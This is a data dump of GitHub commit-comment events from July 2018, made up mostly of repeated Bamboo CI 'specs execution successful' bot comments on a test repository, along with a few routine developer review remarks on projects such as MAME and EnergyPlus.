{"id":"7930367317","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624888,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-06T18:32:39Z","updated_at":"2018-07-06T18:32:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:32:39Z"}
{"id":"7930369302","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624893,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-06T18:33:12Z","updated_at":"2018-07-06T18:33:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:33:12Z"}
{"id":"7930370325","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624897,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-06T18:33:28Z","updated_at":"2018-07-06T18:33:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:33:28Z"}
{"id":"7930371755","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624901,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-06T18:33:52Z","updated_at":"2018-07-06T18:33:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:33:52Z"}
{"id":"7930372113","type":"CommitCommentEvent","actor":{"login":"chalin"},"repo":{"name":"dart-lang/site-www"},"payload":{"comment":{"id":29624902,"position":6,"line":362,"path":"src/_guides/language/effective-dart/usage.md","commit_id":"4d33c21a732bc8a3b88d3080bcd66fa0e2a56159","created_at":"2018-07-06T18:33:58Z","updated_at":"2018-07-06T18:33:58Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-06T18:33:58Z"}
{"id":"7930373652","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624903,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-06T18:34:22Z","updated_at":"2018-07-06T18:34:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:34:22Z"}
{"id":"7930374380","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624905,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-06T18:34:34Z","updated_at":"2018-07-06T18:34:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:34:34Z"}
{"id":"7930375071","type":"CommitCommentEvent","actor":{"login":"Ramsis-SNES"},"repo":{"name":"Ramsis-SNES/furryrpg"},"payload":{"comment":{"id":29624906,"position":null,"line":null,"path":null,"commit_id":"d744eef6750b9d153faf52ffd8958413cf757800","created_at":"2018-07-06T18:34:45Z","updated_at":"2018-07-06T18:34:45Z","author_association":"OWNER","body":"I forgot to mention that this also removes the GFX-based VWF item display."}},"created_at":"2018-07-06T18:34:45Z"}
{"id":"7930376268","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624909,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-06T18:35:04Z","updated_at":"2018-07-06T18:35:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:35:04Z"}
{"id":"7930378266","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624918,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-06T18:35:34Z","updated_at":"2018-07-06T18:35:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:35:34Z"}
{"id":"7930378737","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624922,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-06T18:35:41Z","updated_at":"2018-07-06T18:35:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:35:41Z"}
{"id":"7930378789","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624924,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-06T18:35:42Z","updated_at":"2018-07-06T18:35:42Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-06T18:35:42Z"}
{"id":"7930379102","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29624928,"position":null,"line":null,"path":null,"commit_id":"2c7485c11c4e62479a61d3b2e28fd84677e2fe40","created_at":"2018-07-06T18:35:46Z","updated_at":"2018-07-06T18:35:46Z","author_association":"MEMBER","body":"Just write the commit description next time, not only the title!\r\n\r\nFirst line = title\r\n\r\nthen add empty line and write description"}},"created_at":"2018-07-06T18:35:46Z"}
{"id":"7930381035","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624934,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-06T18:36:16Z","updated_at":"2018-07-06T18:36:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:36:16Z"}
{"id":"7930382847","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624940,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-06T18:36:44Z","updated_at":"2018-07-06T18:36:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:36:44Z"}
{"id":"7930383077","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624945,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-06T18:36:48Z","updated_at":"2018-07-06T18:36:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:36:48Z"}
{"id":"7930383328","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29624946,"position":null,"line":null,"path":null,"commit_id":"fe6851a2d5fa2d0ea7ad21d9969bae6698f32505","created_at":"2018-07-06T18:36:52Z","updated_at":"2018-07-06T18:36:52Z","author_association":"CONTRIBUTOR","body":"This commit fixes stack overflow exception issue noted in 64-bit builds with falcon40 - atarist.cpp \r\nGets rid of \"Caught unhandled exception\" error for megaste_es, megaste_it - atarist.cpp\r\nGraphic corruption fixed in\r\nhermit - blitz68k.cpp\r\n![hermit-diff](https://user-images.githubusercontent.com/9075896/42394679-feb0d6ea-8128-11e8-8928-fe388619edca.png)\r\n\r\n-----\r\nHowever, possible regressions from this commit noted in screenshot compares:\r\nhp9816 - hp9k.cpp\r\n![hp9816-diff](https://user-images.githubusercontent.com/9075896/42394688-06083e2e-8129-11e8-8f53-c02375e6d186.png)\r\nhp9k330, hp9k340, hp9k370, hp9k380, hp9k382 - hp9k3xx.cpp\r\n![hp9k330-diff](https://user-images.githubusercontent.com/9075896/42394694-0d903340-8129-11e8-9026-b17cb0809710.png)\r\n![hp9k340-diff](https://user-images.githubusercontent.com/9075896/42394695-0d9f463c-8129-11e8-9019-cc8e72bfa790.png)\r\n![hp9k370-diff](https://user-images.githubusercontent.com/9075896/42394696-0dae4dd0-8129-11e8-8855-9ef608e6b70c.png)\r\n![hp9k380-diff](https://user-images.githubusercontent.com/9075896/42394697-0dbd5e6a-8129-11e8-9951-c4d1b475f0b7.png)\r\n![hp9k382-diff](https://user-images.githubusercontent.com/9075896/42394698-0dd6d4da-8129-11e8-9736-d08fde4eb9c6.png)\r\n\r\nMore posted if found\r\n"}},"created_at":"2018-07-06T18:36:52Z"}
{"id":"7930385542","type":"CommitCommentEvent","actor":{"login":"groverb"},"repo":{"name":"groverb/Stack_ClassProject_Part_A"},"payload":{"comment":{"id":29624954,"position":null,"line":null,"path":null,"commit_id":"1d41b0c4bf7702322869b203dc7a65f03ee7c96f","created_at":"2018-07-06T18:37:26Z","updated_at":"2018-07-06T18:37:26Z","author_association":"OWNER","body":"changes made: line 335: return NULL changed to return head (line 341)"}},"created_at":"2018-07-06T18:37:26Z"}
{"id":"7930385667","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624955,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-06T18:37:28Z","updated_at":"2018-07-06T18:37:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:37:28Z"}
{"id":"7930385903","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29624956,"position":null,"line":null,"path":null,"commit_id":"b48f169a40bd467619304a3ef564a421435aa852","created_at":"2018-07-06T18:37:31Z","updated_at":"2018-07-06T18:37:31Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2973 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T18:37:31Z"}
{"id":"7930387477","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624958,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-06T18:37:55Z","updated_at":"2018-07-06T18:37:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:37:55Z"}
{"id":"7930387545","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624959,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-06T18:37:56Z","updated_at":"2018-07-06T18:37:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:37:56Z"}
{"id":"7930389930","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29624966,"position":null,"line":null,"path":null,"commit_id":"b839663c27d87674fa0a639df551dd7d559ba469","created_at":"2018-07-06T18:38:35Z","updated_at":"2018-07-06T18:38:35Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-60](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-60).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-60-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-06T18:38:35Z"}
{"id":"7930390306","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624967,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-06T18:38:41Z","updated_at":"2018-07-06T18:38:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:38:41Z"}
{"id":"7930391107","type":"CommitCommentEvent","actor":{"login":"jjjimenez100"},"repo":{"name":"jjjimenez100/A-Silent-Voice"},"payload":{"comment":{"id":29624970,"position":null,"line":null,"path":null,"commit_id":"55c6936733e37be6483406f9b56d815f968cd071","created_at":"2018-07-06T18:38:54Z","updated_at":"2018-07-06T18:38:54Z","author_association":"OWNER","body":"@jh-diaz Modify lines 43-47 of OpenCV Wrapper for real time testing. Disregard code blocks on Main.py."}},"created_at":"2018-07-06T18:38:54Z"}
{"id":"7930391652","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624972,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-06T18:39:03Z","updated_at":"2018-07-06T18:39:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:39:03Z"}
{"id":"7930391932","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624975,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-06T18:39:08Z","updated_at":"2018-07-06T18:39:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:39:08Z"}
{"id":"7930394659","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624986,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-06T18:39:52Z","updated_at":"2018-07-06T18:39:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:39:52Z"}
